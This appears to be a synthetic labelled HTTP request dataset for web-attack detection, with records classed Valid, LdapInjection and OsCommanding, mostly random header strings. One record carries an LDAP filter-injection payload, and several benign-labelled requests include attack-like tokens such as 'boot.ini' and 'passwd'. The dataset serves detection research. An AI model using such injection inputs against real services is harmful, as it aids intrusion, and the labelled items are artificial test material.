If-Modified-Since: Sun, 26 Feb 06 11:31:03 GMT
If-Unmodified-Since: Sat, 02 Jul 05 12:47:28 CET
If-Match: "Urz2GtBOwi@Jzgy0"
If-None-Match: *
If-Range: "79kjn6TzVRBfq0MXODY"
Max-Forwards: 64
MIME-Version: 8.5
Pragma: e=ie
Proxy-Authorization: aoj98 HAaB0=Gia8gEd
Authorization: NTLM MHBSa2NldGhOZHdTcmE4ZXBoZ25lYTFyT2F2RWJ0c2Jlbm5zbw==
Range: 9707-,3-93
Referer: /otbac/jn1ette.aspx
TE: trailers,gzip
Trailer: Expect
User-Agent: ivUFucs http://www.ohne8ibr.it
UA-CPU: Sparc
UA-Disp: 8263,026,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 320x815
Via: FTP/7.1 145.26.254.137
Transfer-Encoding: deflate
Upgrade: arx0t/5.9, nloymn/5.4
Warning: 006 www.atnuej.css "tOivnyllv" "Tue, 15 Jun 04 03:48:59 GMT"
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 99968202
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32178
Start - Id: 37633
class: LdapInjection
POST /iaGNQN_6Myprf/aekTsfzilrleicceieie/eri94eeZeie/xot/to0aetnatr2/r.d/EssaNtaJoehzizen/fHywkB94/kidwOndcTnP9tr.sh? HTTP/1.0
Content-Length: 183
Content-Language: usug3ha,fisieaid
Content-Encoding: compress
Content-Location: http://3OhhaO.net/eapr11/Aheney3/ou23o8/ewupcjfs/H9hbt.jsp
Content-MD5: c2xpbXNvcjBoYmVlU3N6RA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Jul 07 17:29:40 CET
Last-Modified: Fri, 26 Jan 07 22:35:59 UTC
Host: 243.187.95.48
Connection: close
Accept: video/*;q=0.8, audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.6, compress, deflate, deflate;q=0.4
Accept-Language: *
Cache-Control: max-age=92
Client-ip: 48.79.161.71
Cookie: unionmochaIdMJU0position=+ipsoew>0t2ecAr;ebrofte25atv=9OaI
Cookie2: $Version="477"
Date: Fri, 29 Feb 08 12:28:22 GMT
ETag: "UasEgXZAUoa8Yhw8"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Sat, 29 Sep 07 24:03:23 CET
If-Unmodified-Since: Tue, 26 May 09 04:17:29 CET
If-Match: "bhbbKh8reMkrOEpvhI3q"
If-None-Match: "KAGCoMejRUD21ppF"
If-Range: "oyGgXVYLn2f.HERzf"
Max-Forwards: 6773
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic aXJ0d2E6cmVtaA==
Authorization: nltei epniie=dzlns
Range: 5-39626,617734-853345
Referer: /a5oy9pu.htm
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/2.9 (X11; U; Open BSD i386 2.6; br-ae; rv:5.4.6) Gecko/64472467
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: 4.3 www.ne8nGp.html
Transfer-Encoding: oo2rF1; vii9w8=zsspt
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 011740300898
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mEyhasr=35)(&(objectClass=jant)(|(sn  =    qe)(cn=aae    J*))&y3hyihto=en$o&rNYTboot.inihp-u7F=tl>eft&hgth0=evHcBpzqm9Ix&aesd4eaolnrd=s9cOdn%czicoe

End - Id: 37633
Start - Id: 19801
class: Valid
GET /e6gOCPuw/ioda3.css?tea6lnm39hmt=ecih6a&hiiontfggd=inputFe&tlKq=e5fqiz16et0&51okgngjc=tun0&atuEvrxrld3rseu=+ojiTe%5Dp&nu1rsWb=httgih HTTP/1.0
Host: 193.66.250.175:71914
Connection: nsgc
Accept: image/png;q=0.5, video/quicktime;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale=13257
Client-ip: 140.175.207.228
Cookie: etdmhTrzn0a=1593985660;mpfh=05272315;lztah7n=Ioty;iah=$ah1;gtee8ehoaFih=2gnyevLca8amTzpi;sGnrau49rt5r=48UO1_fW5
Cookie2: $Version="3"
Date: Fri, 20 Nov 09 07:06:36 CET
ETag: "d5jLxONTyLJ.jz-7wI0n"
Expect: eupddlzx
From: ilotit@a0vnis.fr
If-Modified-Since: Wed, 07 Nov 07 18:01:14 CET
If-Unmodified-Since: Fri, 03 Jul 09 14:23:25 GMT
If-Match: "SgQEobL2wB514kB"
If-None-Match: "jbEEFxCl02HV-tWx"
If-Range: Wed, 31 Aug 05 12:35:24 GMT
Max-Forwards: 15
MIME-Version: 0.5
Pragma: r='ntstthe'
Proxy-Authorization: Basic c3Q3dGx0OmFpaHBzc3k=
Authorization: Basic bmFzVHZvZnQ6bmV0aW5vaHk=
Range: 451438-434
Referer: /firciuN/htctW2t/wyonkc.conf
TE: trailers
Trailer: If-Modified-Since
User-Agent: f2antogy6nnnkiit
UA-CPU: 68000
UA-Disp: 881,593,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9755x916
Via: FTP/1.4 www.eaeHha.png, FTP/1.9 69.156.199.99
Transfer-Encoding: Ureie; nn25sseR=gfs3blg
Upgrade: saa/5.6, eixi/8.0, q2nz4/6.0, 8veo/1.9
Warning: 702 229.105.183.134 "ecnLurn" 
X-Forwarded-For: 151.180.14.8
X-Serial-Number: 09282554265324
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19801
Start - Id: 20821
class: Valid
GET /9XRknzFM5A/iCWdwvjgRT/dsnness.html?BsK3SM=738450&8med70r=73&dtr1egRmt2=+zkm%40lo4hhgoxei%26%3E&nd=%2Bstodi&wdeoAc=jhiuNzott9&psa7LTB9cbeRT=sjgerptrmersrhotnl&istissp=6cmd%3An&xse9reE=iVc&Ptcr=dnnxaetn4&ipform@LzUyA=rHlT&itnihandytE=91&no=r%5Ddocumenta&antsn=lod%24rt8Nnetc%3Bocurt HTTP/1.0
Host: www.otee.ch
Connection: keep-alive
Accept: video/mpeg;q=0.6, application/rtf;q=0.7, text/html;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.7, gzip;q=0.9, deflate;q=0.7
Accept-Language: erfpy-ptEdpe;q=0.4, aJ-hl
Cache-Control: only-if-cached
Client-ip: 69.221.101.250
Cookie: capee=;w
Cookie2: $Version="003"
Date: Tue, 07 Oct 08 20:02:33 UTC
ETag: W/"DeYc6lmQl-YJGqzsxV"
Expect: nmao=teaea;oidrhia
From: itbAy3@24cao.it
If-Modified-Since: Fri, 16 Jun 06 05:20:37 UTC
If-Unmodified-Since: Wed, 28 Apr 10 17:49:01 UTC
If-Match: "ejlgHsmUzCj1ZrG"
If-None-Match: "uB505UxwHa43.IO"
If-Range: Thu, 14 Dec 06 23:54:51 CET
Max-Forwards: 2
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic ZXFubDpHQW5tRQ==
Authorization: Basic eWU4RmV0OnlhdmVmSQ==
Range: 05030-356,-016,3009-
Referer: http://www.IleO.uk/ssie/7laumand/hiemn/ehr5in.pdf
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: aD7Pq9S http://www.yMNTex3t.uk
UA-CPU: PowerPC
UA-Disp: 7276,7233,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3856x4150
Via: zpwiad/5.1 www.honvnie.shtml, neHk/6.9 113.8.215.192
Transfer-Encoding: identity
Upgrade: ehs/7.1, th3/2.3
Warning: 765 186.65.136.9 "kes3cga1t4maesoo" "Mon, 23 Nov 09 01:50:54 CET"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20821
Start - Id: 5531
class: Valid
POST /cT9PmdYn4HO4Kh.xiV/9xegNhkrlglgaoidR/aj6gonBrux9ntoaex/k91Vn/fcitvcle8rnrSayrE/eUg.Bge/raFIQaD.gif? HTTP/1.0
Content-Length: 252
Content-Language: r,6sAeRrs,fO6aao
Content-Encoding: identity
Content-Location: http://www.wtc1tn.st/3rasmtb9.txt
Content-MD5: dXZUQWVjZW50ZXNhaWhzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 May 09 17:50:23 CET
Last-Modified: Wed, 16 Sep 09 03:59:00 UTC
Host: 61.199.129.152
Connection: keep-alive
Accept: audio/basic;q=0.5, video/mpeg, text/html;q=0.0
Accept-Charset: euc-jp;q=0.6, x-mac-icelandic, x-mac-hebrew;q=0.5, iso-10646-ucs-2;q=0.0
Accept-Encoding: 
Accept-Language: ipLeC-os1za, Ietwsfr-o8ia8hOw;q=0.2
Cache-Control: no-cache
Client-ip: 236.72.177.33
Cookie: atimwril=jgsnwttss;deleten-Q3WZchild1U=wd3E7FLdts;aeetehhcsintt=lMmYYN
Cookie2: $Version="62"
Date: Sat, 21 Jun 08 08:40:55 UTC
ETag: "V_qErrkrpRelawPe-"
Expect: 100-continue
From: rCwltOn@8nntmteThr.de
If-Modified-Since: Mon, 18 Apr 05 21:35:57 GMT
If-Unmodified-Since: Wed, 14 Apr 04 23:25:25 UTC
If-Match: "XpzupU8.KsvfaTah2"
If-None-Match: *
If-Range: "Ei4TuqLG65yfax7r7"
Max-Forwards: 919
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic NG14MmU5Omxzbm5vbWM=
Authorization: NTLM YUV0Z2Zzd2x0bG8wanRlb2hzY2g0NzgxYmVyN3lnbmlQNzhF
Range: 6092-077254
Referer: http://h9esab.fr/Sdilean.swf
TE: gzip;q=0.6,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: rane3fif/7.7.0.0.9
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 333x0999
Via: 6.3 www.oe1n.html
Transfer-Encoding: gzip
Upgrade: Hihns/1.6, ORos/3.8, etn9/6.1
Warning: 096 www.Sbfne.tiff "89IbUita" "Wed, 23 Dec 09 11:24:02 CET"
X-Forwarded-For: 87.149.9.72
X-Serial-Number: 5097796244152405039
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0euuIlrys=e7nAtrsi&03tora0dn2=17439076&5lsT1=siuklHyGea5tn0Svos&sno4tobirt=sGWafHY&5a.18lFRGw=2215&icw3a=7370907&es=admin&wz=607&Uh8z-WLDv=qo) &ioNeellcya=8&zooedaoEw9tdwxn=uwdi2uoENoOlefcoD1&XGLXnVmI9connecte=95549&I7pra7Pzdttr=2444450&le=0791155324

End - Id: 5531
Start - Id: 11357
class: Valid
GET /Taeoncajiwsb/36eomoaiaart2arn2E/puuZR6pyOVkSv/7lsss69sXn/yesrslomrdlF/pmochaSJ1uP/eFl/ttr1m/fgHttQ.nsf?ABQy@jor=ubW2EaX HTTP/1.0
Host: www.eane.de
Connection: sanw
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: deoa-eofx9e;q=0.8, izsmt-tmgst;q=0.3, mh4k-et2io9C, iDfs-yeeAt
Cache-Control: no-cache
Client-ip: 111.229.93.72
Cookie: Osirt7tpR=ruwjaXxj;t0-wechobin=f;9haeIaer;a09co=w9wtranhaE
Cookie2: $Version="683"
Date: Wed, 03 Jun 09 14:58:59 GMT
ETag: W/"FFO.WqZBY@OGCvXC9"
Expect: 100-continue
From: lbain@rrsavE8.cz
If-Modified-Since: Fri, 15 Feb 08 06:16:39 CET
If-Unmodified-Since: Sat, 30 Dec 06 10:42:20 UTC
If-Match: *
If-None-Match: *
If-Range: "W.jParX4c5GQr.u"
Max-Forwards: 929
MIME-Version: 2.1
Pragma: 8Rjtt='h4th'
Proxy-Authorization: NTLM ZXNhdHQ1ZWxmczExdFJ0Y2hpdnFBMmNkUHJyWWdpVkVlc2FpdWV0bmVzbg==
Authorization: Digest username="eseavhh"
Range: 4974-38816,67976-
Referer: http://www.uiNds.gov/rnpnafh.gif
TE: trailers
Trailer: Max-Forwards
User-Agent: jhut/7.9.9.3.6
UA-CPU: StrongARM
UA-Disp: 400,6938,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 953x845
Via: 1.7 230.102.104.175
Transfer-Encoding: compress
Upgrade: Era/2.3, sosofe/2.9
Warning: 653 163.69.67.140:18465 "sEdssEstnl3pgS" "Fri, 02 Apr 04 06:23:18 CET"
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 0505318
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11357
Start - Id: 25876
class: Valid
GET /r.L8Ak.gif?ucrhtzaDtue=cmdometaCcheao+d%24t4&mmeEg0l=dqmHnTrTe+hel&mille0get=p8tru4dnntetUi&elysaoN=399&9sMo24y=apasswd%26tesiqt&nsodgs0=gQZPcWulCC&taihrscm=3765948&Yadfshj=pdzQhr&remucii=lanph-uettn&erdniid=9&trsga=t.qf-&V0KakvGfrom=h8o40r HTTP/1.0
Host: www.o0ernhs.de
Connection: close
Accept: text/*, image/*, audio/basic;q=0.5
Accept-Charset: windows-1258;q=0.7, iso-8859-8-i;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 208.224.54.200
Cookie: EpfataeatEo7=2;Dboot.iniQJV8z=uniontemchildete;nemiE54cio3wrxr=+h=lt;bclosteer=Oesbo
Cookie2: $Version="13"
Date: Fri, 30 Sep 05 22:25:40 GMT
ETag: W/"WXYJo1uz4.eSTjq"
Expect: TwAOmaso=sdty;a6UohENu
From: be0oew@2lap0f3uX7.be
If-Modified-Since: Thu, 05 Oct 06 10:20:59 GMT
If-Unmodified-Since: Fri, 12 Mar 10 22:54:20 UTC
If-Match: *
If-None-Match: "wyI9buMb_JoFl-y.J"
If-Range: Thu, 13 Nov 08 24:45:13 UTC
Max-Forwards: 059
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest nc=e52Ed6B1
Authorization: Basic dXpMcnRiaDp0a2FpaXRl
Range: 843-0717,4422-,58581-1046
Referer: http://eniG.uk/aktZ/Lhuueie.png
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/9.3 (X11; U; Open BSD i586 4.1; dn-yi; rv:6.3.8) Gecko/22620152
UA-CPU: 68000
UA-Disp: 291,6267,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 027x334
Via: sD1r/4.7 208.149.11.140, etsz0a/5.2 86.79.123.83, ope/0.7 www.rxoieai.html:1
Transfer-Encoding: gzip
Upgrade: fsrqfZ/4.4
Warning: 475 239.46.236.100:495 "nrrfTazoeykacyd" "Wed, 17 Sep 08 02:20:51 CET"
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1952797256
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25876
Start - Id: 14723
class: Valid
GET /hxN.bin?fdhe=pTqselectRni%3Ce&uvormep8yf=s6hdetodigoSeerh&ZEl1nlxjd0enai=Eerdn%3As0access_logonn&rmcttanwemdstbr=icofooZmeVNgrmt&esfhLionit=8LRdH5W.e01V HTTP/1.1
Host: www.pehg.fr
Connection: close
Accept: video/mpeg;q=0.4, text/*
Accept-Charset: *
Accept-Encoding: identity;q=0.1, gzip;q=0.1, deflate;q=0.9, gzip;q=0.4, deflate
Accept-Language: *
Cache-Control: max-stale=375
Client-ip: 157.235.60.81
Cookie: hcilTouGt5e=8302496301;otesttdGnein=ncd3ucn
Cookie2: $Version="95"
Date: Sat, 08 May 04 22:28:28 UTC
ETag: W/"CjXd5ytRG8C2ENF8MV"
Expect: 100-continue
From: nDone@1pntglpR.cz
If-Modified-Since: Wed, 12 Aug 09 21:05:29 UTC
If-Unmodified-Since: Wed, 27 Dec 06 10:21:04 UTC
If-Match: *
If-None-Match: "N36KtPwnF.j-Q639"
If-Range: Mon, 10 Dec 07 22:54:22 UTC
Max-Forwards: 50
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://tett.ch/tulLjgt.swf
Authorization: NTLM c2E1emVjaDlNZWFybG1lYWJFc2lINWhjUlRyZXJ0YzI5cmJl
Range: 07-
Referer: /fotea/Arowah/eonsnDyy.mspx
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/4.6 (compatible; aefO; Win 9x; Aoehnonhae; o7naijstwa)
UA-CPU: x86
UA-Disp: 733,9202,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0607x7080
Via: IirXu/6.5 159.156.91.94
Transfer-Encoding: tifl7h; eieie=cildup
Upgrade: Rao/2.1, aia/6.3, Zaxcfe/9.5
Warning: 608 35.90.44.87 "ae4ie56cttt9det" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14723
Start - Id: 30047
class: Valid
GET /9@y5TR/bxfSwEZex@-udcHzbm.cfm?znsnyerl6Neelio=gzYrL&wiCwns7aI9nnihm=i2l5NiiDecRvicp&doeaHeoldsiac2=4746700 HTTP/1.0
Host: www.0xhr.de:80
Connection: a2y4annn
Accept: */*
Accept-Charset: euc-jp;q=0.6, x-mac-cyrillic
Accept-Encoding: deflate;q=0.2
Accept-Language: *;q=0.4
Cache-Control: d=alsy
Client-ip: 74.104.137.199
Cookie: jN0addr5yl=1949286;RyJH6ahz=royIr6ron;6yob=gn&liio;zhxG_vdVbYlb=system de1us2%tfsocqr
Cookie2: $Version="27"
Date: Wed, 08 Sep 04 20:19:58 GMT
ETag: W/"Pmk5rdMZJSGiwkH"
Expect: 100-continue
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Tue, 22 Dec 09 03:30:33 UTC
If-Unmodified-Since: Sun, 29 Apr 07 09:39:10 CET
If-Match: "ZzX4bi2FBNKFWSX_kBL"
If-None-Match: *
If-Range: "fVfuam9@feYEq3UIUU"
Max-Forwards: 66
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM MWV0MGVhbmkzVHRyb21uM3I0aXIwcGJ1Q3lvbml1WXZ3bGUzcmFpZ2xkbg==
Range: 98-
Referer: /aiiU7.tar.gz
TE: deflate;q=0.9,trailers,trailers
Trailer: Warning
User-Agent: eeaaent9m/9.0.6.9
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 796x660
Via: HTTP/5.6 111.170.228.238, 0.3 201.6.159.205
Transfer-Encoding: identity
Upgrade: 0ce/9.6, phs5ao/7.8, yryd/4.5, ii3l/7.5, bmr/2.3
Warning: 531 237.168.84.24:72647 "iewoodtgohtnom" 
X-Forwarded-For: 136.28.255.110
X-Serial-Number: 44720995
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30047
Start - Id: 18207
class: Valid
GET /htpass_copyi/f1OnFsxml_/NGincluded/eGIp4/fcno3nlnd/EYM/ezxfIxrPHaF7t/9lrgR.sh? HTTP/1.1
Host: www.e0ii6c.de
Connection: close
Accept: image/*, image/png;q=0.0
Accept-Charset: x-mac-hebrew;q=0.6, iso-8859-6, windows-1254, iso-8859-6;q=0.6
Accept-Encoding: gzip;q=0.7, compress;q=0.4, gzip, identity;q=0.6
Accept-Language: yrPie-cU8;q=0.3, heFao-e5isssO, osy-aug, oecahts-1hordae, eder-7rrsqnrD
Cache-Control: min-fresh=22576
Client-ip: 18.171.181.243
Cookie: unionHzinputQL5objectvO=Ds3;bcx7pmtoe=a 9 $tzinput;msnuibv=2iIs$
Cookie2: $Version="20"
Date: Tue, 25 Apr 06 15:53:55 UTC
ETag: W/"kbsG2wxTIYHzOzT-h"
Expect: 100-continue
From: oritsj@i639iid.org
If-Modified-Since: Fri, 30 Jan 04 09:20:42 GMT
If-Unmodified-Since: Sun, 29 Apr 07 14:28:51 CET
If-Match: *
If-None-Match: *
If-Range: "_NjsNoYOIFtJFpnv"
Max-Forwards: 5628
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic Zkllc3dPOm5BamV1cg==
Authorization: Basic ZWFSeGlpYjp3dHNjODg=
Range: 666465-916
Referer: /ee3y8k/ckEvsh/k1ip.asp
TE: trailers,deflate;q=0.0
Trailer: Referer
User-Agent: d5bUBUfD http://www.tTeooz.com
UA-CPU: StrongARM
UA-Disp: 202,576,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 446x226
Via: 9.7 146.141.142.83:07611
Transfer-Encoding: compress
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 457 249.243.123.227 "ar3gutfzh" "Thu, 05 Jul 07 12:26:34 GMT"
X-Forwarded-For: 138.19.25.37
X-Serial-Number: 6427210838
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18207
Start - Id: 28598
class: Valid
GET /ENE/0h13riatHr/hzue6zozchmrisc5tn/CpY/ehCCmp/XzYDhdBOK/tyN7ZQhrfuZaYjQeRTX/aennkofm5aYvyrna/i2BmLAKbA_8/hnSo2eVhTOlAE/nOQG3E/iC2CboUWXr6Subr2.gif?6eubre=olnlSlUirntettao&stE=tQKWjX&eswi=lu4weiler&ksiWrpNn=%28&Xg=tcatimeta%28dhn&aQlnitsj2mae=tq+&tyDtgaliHeremh=lstar&useC=o74&hpobao=s-oOOFotZ&g0taiMfcd11Uj6f=iuiz&NWw8PA3=rrka&lb=2ttroMdepeda&zU_D2=nf%3Cls&ostrtshe6r=bd5o&2wgetsamMQ7=iooegotEtlGv3cytoo HTTP/1.0
Host: www.6nre5grhe.de:80
Connection: Eeou
Accept: */*
Accept-Charset: windows-1250;q=0.2, windows-1252
Accept-Encoding: deflate;q=0.8, identity;q=0.3, deflate, deflate;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 186.187.138.111
Cookie: clwsus=t_@u
Cookie2: $Version="23"
Date: Fri, 23 Apr 10 02:24:57 CET
ETag: "NcioNvz7YIdfPzPVN"
Expect: 5atetUe
From: toIs6eah@Rhqboi.biz
If-Modified-Since: Mon, 11 Dec 06 07:10:28 CET
If-Unmodified-Since: Sat, 18 Dec 04 08:53:49 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 24 Sep 07 10:08:49 GMT
Max-Forwards: 41
MIME-Version: 1.3
Pragma: dt45='yenefa'
Proxy-Authorization: Digest opaque="nteit8ao"
Authorization: ibppWf euTtd5l1=ihtoo
Range: 014552-643
Referer: http://www.jfoltH.net/etay/tjiia/dosteoda/hxsd.png
TE: trailers
Trailer: Cache-Control
User-Agent: bonmras
UA-CPU: MIPS
UA-Disp: 224,8180,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 379x210
Via: 9.9 www.rnfs.css
Transfer-Encoding: deflate
Upgrade: otn/0.5, aheaSs/9.3, s7ssen/3.8, wen/9.3
Warning: 221 www.1et65lOl.htm:396 "oiug" 
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 90657
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28598
Start - Id: 19484
class: Valid
GET /o_MGnRK/.aujVaB/kelipdeyhStndhRd/expo1Ea/oaKwfyaj/sosnolDroOnate7J.png?eba3dfxneu=Tnosl%40eanc%28oV&Hna=92855498&0A.Uiand3G=6JNmo8hZL&tk=3815754745&iurAdtwmpuidgie=eN&psNio=162&dupottsd9aHoe=lt&lfamc=r8i&niauatt2anom6kD=1227&cziyrniduliehyd=koi4n&eks=nXJwyx&MmvXD.uL=64984480&lWLZ.Extermg3=n2Q&nstzkdplrN3=ejmh&ooupareN=yh31f7resae-fqeSOe HTTP/1.0
Host: 246.25.97.217:80
Connection: keep-alive
Accept: audio/x-wav;q=0.5
Accept-Charset: x-mac-roman, iso-8859-3;q=0.5, x-mac-chinesesimp
Accept-Encoding: gzip;q=0.6, compress;q=0.2, compress;q=0.2, identity
Accept-Language: umnylf1-roirl1ht;q=0.0, sne5jp-ehl0a, eaEolt-iezUdcu, 3rsa-Eaxi;q=0.8, n1e5-iid
Cache-Control: no-transform
Client-ip: 25.245.73.193
Cookie: btceitoti=vRG0YjN6IzH;Oengoohuh=882728;Fljtuelzgtae=idaceEen5vdee;es0ne1re=Ioudropdul;On=aizaai$I@m< hz
Cookie2: $Version="1"
Date: Tue, 20 Jul 04 06:12:58 CET
ETag: "TFVzorSm0FRV6Wcq"
Expect: Ota8itr=37su6o;yrhfelu=lEih
From: Ecbe@7imAmy.org
If-Modified-Since: Sun, 07 Dec 08 13:49:42 GMT
If-Unmodified-Since: Tue, 23 Oct 07 21:39:51 CET
If-Match: "vTK6udLRq-3sXZY@SX"
If-None-Match: *
If-Range: "TW-LhHoEvroS7Bfkzqp"
Max-Forwards: 8
MIME-Version: 1.9
Pragma: bis=e
Proxy-Authorization: Digest uri=http://www.3p3m.de/49ldleap/eaosgltI/jsAreodj/5amiaon.bin
Authorization: Basic aWVvczpvdXV0Yg==
Range: 709901-
Referer: http://www.sallxiM7.biz/Oevtu.php
TE: trailers,trailers,chunked;q=0.9
Trailer: Proxy-Authorization
User-Agent: aebtpd
UA-CPU: x86
UA-Disp: 8161,357,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 570x2839
Via: 0.2 www.9ctW.jpg, HTTP/0.7 151.197.76.149:6, 4.2 www.nfmwEny.css:74645
Transfer-Encoding: deflate
Upgrade: ceS7/9.5, eziis/6.7, tze/0.1
Warning: 023 www.yttU5rcS.png "umpoHgenaihro" "Mon, 28 Mar 05 07:12:11 UTC"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 7307968388590
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19484
Start - Id: 13205
class: Valid
GET /rd_VDz.x5E/ui_NBqd7Rc/hmsceoelone/accept5@uDtmp2BKdi_/rXzNOBS9H/opht/loede6Twsrbare/eqXX6@g/5PiCM8YX@/39@QsEwindow.openDfDFoG.asp? HTTP/1.1
Host: www.4o5ihOt.de
Connection: etfael
Accept: audio/*
Accept-Charset: x-mac-greek, iso-10646-ucs-2;q=0.9, koi8-r, x-mac-cyrillic;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 183.238.5.162
Cookie: shceceaferl2th=7136;s7ea=|m;nwron=38;htOrtiaeWitpsh=dr1xyv ado
Cookie2: $Version="29"
Date: Wed, 27 Apr 05 06:54:32 UTC
ETag: W/"YlmpUFhieXa1--E"
Expect: 100-continue
From: msa1sei@snhodn.biz
If-Modified-Since: Wed, 25 Nov 09 21:29:04 GMT
If-Unmodified-Since: Tue, 13 Nov 07 10:14:05 GMT
If-Match: "Uh2_IlsxlRbG7FsFL"
If-None-Match: *
If-Range: Sat, 26 May 07 18:23:02 UTC
Max-Forwards: 7759
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic bGxUbjZvdU86c2FvbGxOZnI=
Authorization: NTLM ZXh5d2l0c2VyMW5sYWVmdWF0cnRzZzJzc2FhVGRlbW1uNm50dGVkU24=
Range: 781398-
Referer: http://www.mlcd.gov/aiMkeOeu/3t5nee/6vteen.cfm
TE: trailers,trailers,deflate;q=0.6
Trailer: Trailer
User-Agent: Mozilla/7.3 (Windows; U; Windows NT 7.3; rh-Ge; rv:1.7.2) Gecko/63728335
UA-CPU: x86
UA-Disp: 026,187,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6667x346
Via: zsUin/4.1 www.isslta.jpg, Y7egt/0.7 80.160.227.4:574, 2.6 183.13.58.91
Transfer-Encoding: identity
Upgrade: tsts/0.5, eao/0.4, t6o/4.1, 2ibk/6.8, ihsqE/6.1
Warning: 751 204.50.136.157 "wlaanseIllOcn4det8i" "Thu, 15 Oct 09 05:51:39 CET"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 2985337239117485
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13205
Start - Id: 42931
class: OsCommanding
GET /L7GNn_XBgn5/qwKOQ0aAtSGGu./9K-KeP9ooJX3/en/tvesbepnhahcoiNdN.tiff?bNhu1betn=953&rrhrilratbt9=597707&awNstwNoc8nosa=eRtD&iNvtl3aaulefbt=0482&eAjeE5nTotiLPc=eetFeore&cotios=7o2ClP HTTP/1.0
Host: www.sepcahciZs.gov:8
Connection: keep-alive
Accept: image/*, audio/*;q=0.9, video/mpeg
Accept-Charset: x-mac-ce, iso-2022-kr;q=0.8, iso-8859-3, iso-8859-5;q=0.1, windows-1258;q=0.7
Accept-Encoding: gzip, identity;q=0.8
Accept-Language: *
Cache-Control: max-stale=92827
Client-ip: 226.241.221.163
Cookie: tas=30469679;eiia9=04164124
Date: Mon, 30 Mar 09 17:19:10 GMT
ETag: "bT7Oxs21s533t2Ud"
Expect: 100-continue
If-Modified-Since: Sat, 28 Oct 06 13:45:22 CET
If-Unmodified-Since: Fri, 05 Nov 04 16:00:37 GMT
If-Match: "nt9UQJpocLbZeJQE2E7u"
If-Range: Wed, 30 Jun 04 23:11:24 UTC
Max-Forwards: 6
MIME-Version: 4.5
Pragma: no-cache
